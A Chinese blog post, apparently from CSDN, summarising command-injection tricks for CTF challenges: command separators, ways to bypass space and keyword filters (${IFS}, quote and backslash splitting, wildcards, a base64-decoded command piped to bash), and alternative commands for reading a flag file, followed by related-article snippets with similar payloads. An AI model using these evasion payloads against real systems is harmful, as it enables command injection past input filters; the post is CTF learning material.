CTF中命令执行知识点总结

最新推荐文章于 2024-08-21 13:58:28 发布
最新推荐文章于 2024-08-21 13:58:28 发布
阅读量1.2k 收藏 8
点赞数
分类专栏: ctf 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hello_super/article/details/108647009
版权

分隔命令

;              # 分号隔开每条命令,整行命令按照从左到右的顺序执行,彼此之间互不影响,所有的命令都会执行。

|              # 只执行后面那条命令。

||             # 只执前面那条命令。

&             #两条命令都会执行。

&&           # 两条命令都会执行。

 

空格绕过

<

<>           # 需要写的权限

${IFS}

$IFS$9

%20

%09

%3c

A=$'cat\x20flag'&&$A

A=$'cat\x09flag'&&$A

 

黑名单绕过

# 一般情况下想flag、php这种字符会被ban掉,这种时候就需要进行绕过了

通配符

*              # 匹配任何文本或字符串,这个通过测试发现并不能与IFS或<这两个字符一起使用

?            # 匹配单个任意字符

空字符

$@            # cat$@t flag

$1-$9        # cat$1t flag

${数字}      # cat${1}t flag

 

编码绕过

echo "Y2F0IGZs YWcucGhwCg==" | base64 -d|bash        # 解码为cat flag.php并执行

echo "cat flag.php"|base64

 

变量替换

$a=t;$b=g;ca$a fla$b.php

 

引号

ca' 't fl' 'ag.php

 

反斜杠

ca\t f\la\g.php

 

Linux查看文件命令

cat        //cat flag.php
tac        //tac flag.php
head    //head flag.php
tail    //tail flag.php
nl        //nl flag.php
more    //more flag.php
less    //less flag.php
od        //od flag.php
grep    //grep 'fla' flag.php
strings    //strings flag.php
sort    //sort flag.php

参考:https://www.cnblogs.com/erR0Ratao/p/13640600.html

周巴帝
关注
专栏目录
ctf命令执行小结
舞动的獾
10-04 4564
1.相关函数 eval函数eval函数能够将字符串当作命令执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
CTF下的命令执行
Lemon's blog
04-28 9764
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1810
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF-命令执行【超详细】
最新发布
Innocence_0的博客
08-21 795
作者简介:不知名白帽,网络安全学习者。
CTF命令执行部分总结
weixin_44770698的博客
12-19 354
CTF命令执行
[GXYCTF2019]Ping Ping Ping {命令执行总结}
qq_42812036的博客
02-13 6008
0x00 知识点 命令注入 绕过空格、敏感字符、连接符 0x01 解题 方法一 内联执行 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ps: 参数顺序要注意,adc换位acdflag会被检测出来:) 过滤了?/\{}()[]* 否则bash语法可以用“?”,正斜杠“/”,数字和字母来执行系统命令。 过滤空格 1.使用<或者<&gt...
CTF-PHP特性知识点总结
zji
07-16 804
系列文章目录 提示:来自CTFshow题目 文章目录系列文章目录来自ctfshow的所有题目总结一、intval()函数二、多行匹配3.== 弱类型与路径问题4.md5()5.三目运算符的理解+变量覆盖6. in_array()函数7.is_numeric()函数优先级 前置需要学习参考 php=与区别 来自ctfshow的所有题目总结 一、intval()函数 例子1 例子1 if(preg_match("/[0-9]/", $num)){ die("no no no!");
CTF密码学部分知识总结(一)
weixin_41038905的博客
04-27 6337
1.凯撒密码(Caesar) #!/usr/bin/python -- coding=utf -- def caesar(cipher): for j in range(26): str_list = list(cipher) i = 0 while i < len(cipher): if not str_list[i].isalpha(): str_list[i] = str_list[i...
ctf总结.md
05-14
先去DVWA学习文件上传,文件包含,代码执行命令执行,尽量亲手操作一遍,然后看前三个难度的源码,impossible难度的可以了解,网上有针对DVWA很详细的讲解 1.养成看源代码的习惯(简单) flag在源代码(): 题目 ...
CTFPHP相关题目考点总结(二)
HBohan的博客
02-16 3082
介绍 本篇文章主要总结了我在写ctfshow题目遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。 PHP特性相关考点 一、 考点:php正则表达式的匹配模式差异。 例题: show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写,/m表示多行匹配 i.
CTFshow web入门之命令执行总结
小白的博客
05-10 495
1、命令执行函数。
CTF相关命令使用
01-21
了解CTF见到的非常不错的素材资源,这个是关于网络设置较多的文档
BUUCTF命令执行知识点总结
qq_49833809的博客
11-13 325
命令执行知识点总结
ctf 命令执行
weixin_74427106的博客
04-01 315
什么是命令执行漏洞:命令执行漏洞就是服务器端没有对客户的一些命令进行过滤,导致客户任意拼接命令使网站进行执行;过滤了flag所以我们只要命令里不出现flag即可所以构造。这里我不知道为啥不能用一句话木马,后续知道了在补充;运行后打开源码后即可得到flag。运行之后查看源码即可得到flagctfshow web入门29。先分析代码发现过滤了.和空格。这里我会个一句话木马。
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3543
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1571
1.**cat fl[abc]g.php ** //匹配[abc]的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
命令执行笔记
qq_51248658的博客
02-15 370
个人笔记,有点乱
Ctfer训练计划】——命令执行的解题技巧(持续更新)
Demo不是emo的博客
12-31 5978
ctf命令执行题型解题方法汇总(持续更新
绕过之cat|/ flag
m0_61011147的博客
09-06 2154
绕过之cat|/ flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值